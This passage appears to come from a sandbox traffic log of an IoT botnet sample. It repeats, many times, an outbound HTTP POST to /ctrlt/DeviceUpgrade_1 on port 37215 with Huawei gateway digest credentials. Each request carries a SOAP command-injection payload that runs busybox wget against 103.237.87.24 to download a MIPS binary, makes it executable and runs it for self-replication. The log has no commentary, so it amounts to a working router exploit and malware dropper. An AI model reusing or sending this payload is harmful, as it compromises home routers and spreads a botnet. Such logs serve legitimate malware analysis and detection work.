                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1976192.168.2.13454289.98.61.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572614908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1977192.168.2.1352256157.89.11.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572643995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1978192.168.2.1349426197.133.30.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572648048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1979192.168.2.133382041.223.137.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572700977 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1980192.168.2.1337206197.103.28.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572701931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1981192.168.2.1348204197.203.49.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572716951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1982192.168.2.1335904165.8.225.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.572742939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1983192.168.2.1344988197.76.135.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573184013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1984192.168.2.1346966171.76.31.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573185921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1985192.168.2.1356178157.78.42.22537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.573195934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 